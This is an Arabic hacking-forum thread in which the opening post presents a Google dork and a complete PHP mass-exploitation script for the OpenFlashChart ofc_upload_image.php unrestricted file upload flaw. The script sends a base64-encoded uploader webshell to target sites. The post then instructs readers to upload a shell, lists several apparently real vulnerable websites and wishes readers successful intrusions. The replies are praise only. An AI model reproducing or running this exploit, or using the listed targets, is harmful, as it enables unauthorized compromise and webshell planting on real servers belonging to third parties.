اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

حصريا على جيوش الهكرز Remote Code Execution

حصريا على جيوش الهكرز Remote Code Execution


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 12

الموضوع: حصريا على جيوش الهكرز Remote Code Execution

  1. #1
    هكر نشيط Array الصورة الرمزية Cyb3Rm0uJah3D
    تاريخ التسجيل
    Nov 2012
    الدولة
    وطن عربي
    المشاركات
    130

    Hasri حصريا على جيوش الهكرز Remote Code Execution






    السلام عليكم ورحمة الله وبركاته
    الحمد لله والصلاة والسلام على رسول الله ، وعلى آله وصحبه ومن اتبع هداه ، أما بعد :



    من إكتشافي: ثغرة Remote Code Execution في العديد من السكربتات


    الشـــرح


    نضع الدرك في محرك البحث google

    كود:
    intitle:Index of /tmp-upload-images/
    أنا إخترت هذا الموقع (مسار التخزين المؤقت للصور)

    كود:
    http://hot-cs.net/lime/limewizard/_scripts/openflashchart/tmp-upload-images/


    نذهب لهذا المسار (مسار التحميل)

    كود:
    http://hot-cs.net/lime/limewizard/_scripts/openflashchart/php-ofc-library/ofc_upload_image.php
    تظهر لنا هذه الرسالة لتؤكد لنا أن الموقع مصاب

    كود:
    Saving your image to: ../tmp-upload-images/


    نضع هذه المسارات في السكربت php التالي

    كود:
    <form method='POST'>
    <center>
    <input type='text' name='name' value='cyb.php'>
    <input type='submit' value='OK' name='OK'><br><br>
    <textarea name='situs' cols='45' rows='1'>http://target.com/</textarea>
    </center>
    </form>
    <?
            @set_time_limit(0);
            $site = explode("\r\n", $_POST['situs']);
            $namafile = $_POST['name'];
            $path = array('/lime/limewizard/_scripts/openflashchart/php-ofc-library/ofc_upload_image.php');
             
            $nama = array("/lime/limewizard/_scripts/openflashchart/tmp-upload-images/");
             
            $uploader = base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT5VcGxvYWQgRmlsZXMgfCBjeWIucGhwPC90aXRsZT4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBzdWNjZXNzISEhPC9iPjxicj48YnI+JzsgfQ0KCWVsc2UgeyBlY2hvICc8Yj5VcGxvYWQgZmFpbGVkICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
             
            $options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plain\r\n", 'content'=> $uploader));
            $context = stream_context_create($options);
             
            if($_POST['OK'])
            {
                    foreach($site as $situs)
                    {
                            foreach($path as $upload)
                            {
                                    $fopen = @fopen("{$situs}{$upload}?name={$namafile}", 'r', false, $context);
                            }
                            foreach($nama as $namas)
                            {
                                    $url = "{$situs}{$namas}{$namafile}";
                                    $check = @file_get_contents($url);
                                    if(eregi("cyb.php", $check))
                                    {
                                            echo "<center><font face='Tahoma' color='Green' size='2'>[+] Exploit success => {$situs}/{$namas}/{$namafile} <br /></center>";
                                            flush();
                                    }
                            }
                    }
            }
            echo "<center><font face='Tahoma' color='Red' size='2'>[+] coded by Cyb3Rm0uJah3D</font></center>";
    ?>


    نستعرض هذا السكربت على سرفر شخصي أو على سرفر سبق إختراقه



    نضع رابط الموقع في المستطيل كما في الصورة ثم نضغط OK فنتحصل على رابط ملف التحميل cyb.php



    نستعرض الملف cyb.php ثم نرفع الشل في نفس المسار





    هذه بعض المواقع مصابة يمكن تطبيق الثغرة عليها

    http://web.kdz.eu/sites/all/modules/civicrm/packages/OpenFlashChart/tmp-upload-images/
    http://www.hastingsvoluntaryaction.o...upload-images/
    http://www.webstatus.designvault.co....upload-images/
    http://www.adcc.asn.au/main/administ...upload-images/


    ختاما، أتمنى لكم إختراقات موفقة

    ردودكم تهمني


    التعديل الأخير تم بواسطة Cyb3Rm0uJah3D ; 11-21-2013 الساعة 12:13 AM


  2. #2
    هكر مجتهد Array
    تاريخ التسجيل
    Dec 2012
    المشاركات
    258

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution

    شكرا جزيلااا


  3. #3
    هكر متميز Array الصورة الرمزية dark prince
    تاريخ التسجيل
    Jul 2010
    الدولة
    IN DARKNESS
    المشاركات
    1,608

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution

    مشكور للطرح
    واصل ابداعك



  4. #4
    هكر متميز Array
    تاريخ التسجيل
    Jun 2011
    المشاركات
    1,060

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution

    والله بطل مشكور


  5. #5
    :: مراقب عام :: Array الصورة الرمزية shhaby
    تاريخ التسجيل
    Nov 2012
    المشاركات
    3,233

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution



  6. #6
    هكر مجتهد Array الصورة الرمزية boda_hackr
    تاريخ التسجيل
    Dec 2012
    الدولة
    no_ip
    المشاركات
    520

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution

    بطل مشاء الله عليك فى تقدم اخى



  7. #7
    هكر مبتديء Array
    تاريخ التسجيل
    Aug 2011
    المشاركات
    30

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution

    مشكووووووووووور


  8. #8

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution

    شكراااااااا على الطرح واصل ...


  9. #9
    هكر متألق Array الصورة الرمزية Iraqe Hacker
    تاريخ التسجيل
    Jul 2012
    الدولة
    Iraqe Hacker™ ✔©Page&Official®Mafia █║▌│█│║▌║││█║▌║▌║
    المشاركات
    3,254

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution

    بارك الله فيك اخي مبدع



  10. #10
    هكر مبتديء Array الصورة الرمزية mohtasim
    تاريخ التسجيل
    Oct 2013
    الدولة
    السودان
    المشاركات
    47

    افتراضي رد: حصريا على جيوش الهكرز Remote Code Execution

    lمشاء الله عليك روعه يبطل


صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. CiviCRM for Joomla 4.2.2 - Remote Code Injection
    بواسطة موآدع في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 04-26-2013, 02:48 PM
  2. phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution تم ترجمتها
    بواسطة Ace في المنتدى قسم الثغرات
    مشاركات: 5
    آخر مشاركة: 11-06-2011, 08:41 PM
  3. ثغرة remote command execution
    بواسطة angel2486 في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 1
    آخر مشاركة: 11-25-2010, 07:39 PM
  4. ثغره جديده للمتصفح 7 Remote Code Execution
    بواسطة Spy4Man في المنتدى منتدى الإختراق العام
    مشاركات: 4
    آخر مشاركة: 08-24-2010, 06:43 AM
  5. Remote Command Execution
    بواسطة الهكر المجهول في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 01-22-2010, 10:06 PM

وجد الزوار هذه الصفحة بالبحث عن:

index of uploadsname

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •